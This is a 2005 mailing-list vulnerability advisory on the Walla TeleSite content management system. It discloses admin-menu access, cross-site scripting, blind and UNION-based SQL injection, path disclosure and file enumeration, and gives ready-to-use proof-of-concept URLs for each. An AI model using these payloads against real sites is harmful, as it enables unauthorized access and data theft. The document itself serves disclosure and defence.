Walla TeleSite Multiple Vulnerabilities

From: sinneR (rafiware_at_bezeqint.net)
Date: 11/14/05

  • Next message: Carric Dooley: "Re: [fw-wiz] Question about setting up PIX firewall"
    To: <news@securiteam.com>, <bugs@securitytracker.com>, <bugtraq@securityfocus.com>, <Full-Disclosure@lists.grok.org.uk>, <firewall-wizards@honor.icsalabs.com>
    Date: Mon, 14 Nov 2005 17:58:14 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Walla TeleSite
    Vendors: http://www.walla.co.il
    Versions: 3.0 and perior
    Platforms: Windows (ISAPI, a few vulnerabilities apply Linux too)
    Bug: Multiple Vulnerabilities
    Exploitation: Remote with browser
    Date: 13 Nov 2005
    Author: Rafi Nahum, Pokerface
    e-mail: rafiware@bezeqint.net
    web: Not Yet....but soon

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Walla TeleSite is a Website Content Managment CGI web application.
    It is very common amoung big israeli websites. It also used as a wrapper to
    all the website links. It is also used by Walla.co.il and the Walla.com
    Network.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    The TeleSite wraps the website with templates and ids to all the links.
    The main navigation page ts.exe receives a parameter called 'tsurl' and it
    does
    not verifies/limits the numbers it receives, for example it should receive
    0.22.1.0
    if there is such a page, but it shouldn't 0.1.0.0 because it leads to the
    private articles
    menu of administrator.

    In addition, further input filtering is missing in the webpages
    Get/Post/Cookie parameters, this is a "feature" missing to this software
    which causes
    the web programmers using this website content managment engine to think
    their parameters
    are filtered, well they are'nt and this causes all their clients to have
    Script and SQL Injections.
    Where it is obvious that an SQL Injection may lead to complete remote
    compromise if the
    website and XSS to content spoofing, phishing, cookie stealing, D.O.S
    attacks and more.

    The TeleSite application also does not saves the errors to itself...in an
    error.log or something
    similar, it informs the attacker with the local path of the files it could
    not open/access when
    the attacker tempares with the website parameters. A remote attacker can
    also enumerate
    all the files on the machine by supplying their full path to ts.cgi after
    the querystring.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Articles Menu Access:
    --------------------------------
     http://host/ts.exe?tsurl=0.1.0.0

    Cross Site Scripting - XSS:
    --------------------------------------

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<scr
    ipt>alert()</script>

    Blind SQL Injection:
    -----------------------------
     Proof Of Concept:

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
    20'1'='1

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%
    20'1'='2

     Exploitation:

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%2
    0union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,nu
    ll,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ry
    y','poo','polo','nike'%20from%20information_schema.columns--

    Local Path Disclosure:
    -------------------------------
     D:\TeleSite\online\templates\\example\sections\header

    Local File Enumeration:
    ---------------------------------
     http://host/ts.cgi?c:\boot.ini
     http://host/ts.cgi?c:\boot1.ini

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Rafi Nahum, Pokerface
    Greetings to The-Insider

    "Pokerface is the name, reputation follows."


  • Next message: Carric Dooley: "Re: [fw-wiz] Question about setting up PIX firewall"

    Relevant Pages

    • [Full-disclosure] Walla TeleSite Multiple Vulnerabilities
      ... Walla TeleSite is a Website Content Managment CGI web application. ... Where it is obvious that an SQL Injection may lead to complete remote ... the attacker tempares with the website parameters. ...
      (Full-Disclosure)
    • Walla TeleSite Multiple Vulnerabilities
      ... Walla TeleSite is a Website Content Managment CGI web application. ... Where it is obvious that an SQL Injection may lead to complete remote ... the attacker tempares with the website parameters. ...
      (Bugtraq)
    • Re: WORKBOOKS.OPEN (URL) - How to trap a connection-lost/ timeout
      ... > I need to retrieve the market data from a remote location, so there's no> business alternative for me. ... Either the exchange website or a Bloomberg/> Reuters machine on the network. ... I need a way for> my macro to exit if it does not receive a response from a remote computer for> a file request. ... >> Regards Ron de Bruin ...
      (microsoft.public.excel.programming)
    • RE: RWW access to an internal website
      ... We have a link to another IIS website on the companyweb. ... When remote, the ... > E-mail and Internet Connection Wizard". ...
      (microsoft.public.windows.server.sbs)
    • Re: Email Forms
      ... -- Open the website from the remote location, ... -- Right-click, choose Form Properties, ... -- Close the website. ... and then publishing changed files to the remote location, ...
      (microsoft.public.frontpage.client)